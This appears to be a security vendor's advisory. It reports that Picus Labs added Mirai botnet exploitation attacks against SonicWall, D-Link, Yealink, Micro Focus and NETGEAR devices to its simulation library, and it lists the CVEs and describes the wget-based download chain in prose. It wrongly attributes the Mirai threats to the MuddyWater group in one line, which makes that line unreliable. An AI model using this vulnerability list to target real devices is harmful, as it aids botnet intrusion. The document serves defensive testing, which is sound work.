Picus Threat Library Updated for Vulnerability Exploitation Attacks Leveraged by Mirai Botnet Malware

Picus Labs has updated the Picus Threat Library with new vulnerability exploitation attacks leveraged by Mirai malware which has been active throughout 2016. Mirai is a botnet malware that transforms Linux-based networked devices into remotely managed bots that can be used in large-scale network attacks as part of a botnet. Its main targets are IoT devices such as IP cameras, routers, switches, and network security devices such as SSL VPN solutions. Mirai variants are designed for different CPU architectures, such as x86, ARM, MIPS, PowerPC and SPARC.

New Mirai Campaign Targeting Network Devices

In the last month, Unit 42 researchers discovered attacks that exploited a variety of vulnerabilities given in the following table:

Vulnerability	Vulnerability Type	Affected Product	CVSS 3.1 Score
Visualdoor	Remote Command Injection	SonicWall “Virtual Office” SSL-VPN	9.8 Critical
CVE-2020-25506	Remote Command Injection	D-Link DNS-320 Firewall	9.8 Critical
CVE-2021-27561	Remote Code Execution	Yealink Device Management	9.8 Critical
CVE-2021-22502	Remote Code Execution	Micro Focus Operation Bridge Reporter (OBR)	9.8 Critical
CVE-2020-26919	Remote Code Execution	NETGEAR ProSafe JGS516PE Switch	9.8 Critical

Upon successful exploitation of one of these vulnerabilities, the attackers attempt to download a malicious shell script by invoking the wget utility on the target device. The downloaded shell script then downloads multiple Mirai binaries that have been compiled for various architectures and runs them one by one.

Picus Labs Red Team examined these vulnerabilities and added the following threats to Picus Threat Library:

Picus ID	Threat Name	CVE
373908	SonicWall SSL VPN Server Remote Code Execution Vulnerability
470582	D-Link DNS320 Firewall Remote Code Execution (RCE) Vulnerability Variant-1	CVE-2020-25506
604066	Yealink Device Management Remote Code Execution (RCE) Vulnerability Variant-1	CVE-2021-27561
490108	Micro Focus Operations Bridge Manager OS Command Injection Variant-2	CVE-2021-22502
314732	Micro Focus Operations Bridge Manager OS Command Injection Variant-1	CVE-2021-22502
543188	Netgear ProSAFE Plus Remote Code Execution (RCE) Vulnerability Variant-1	CVE-2020-26919

Other Threats of Mirai in Picus Threat Library

Picus Threat Library consists of 31 threats of the MuddyWater threat group, including:

Mirai Botnet .ELF File Download for ARM Architecture
Mirai Botnet .ELF File Download for Power PC Architecture
Mirai Botnet .ELF File Download for MIPS Architecture
Mirai Botnet .ELF File Download for SPARC Architecture
Mirai Botnet .ELF File Download for Intel 80386 Architecture
Mirai Botnet .EXE File Download for Windows Operating System

References

[1] https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/

The Picus Threat Library is a collection of threats and vulnerabilities that Picus Labs updates regularly. It includes threats such as those leveraged by Mirai malware to exploit vulnerabilities in network devices.

The Mirai botnet malware primarily targets IoT devices such as IP cameras, routers, switches, and network security devices including SSL VPN solutions.

The Mirai botnet malware exploits devices by transforming them into remotely managed bots, which can then be used in large-scale network attacks as part of a botnet.

Some critical vulnerabilities include those affecting SonicWall “Virtual Office” SSL-VPN, D-Link DNS-320 Firewall, Yealink Device Management, Micro Focus Operation Bridge Reporter, and NETGEAR ProSafe JGS516PE Switch, all with a CVSS 3.1 score of 9.8 Critical.

Upon successful exploitation, attackers attempt to download a malicious shell script using the wget utility on the target device, which then downloads and runs multiple Mirai binaries compiled for various architectures.

Mirai variants support different CPU architectures including x86, ARM, MIPS, PowerPC, and SPARC.

You can customize your cookie preferences by clicking on 'Cookie Settings' on the website, which allows you to change your default settings. These questions provide information extracted from the page content and are structured to help enhance the site's FAQ section for better engagement and information dissemination.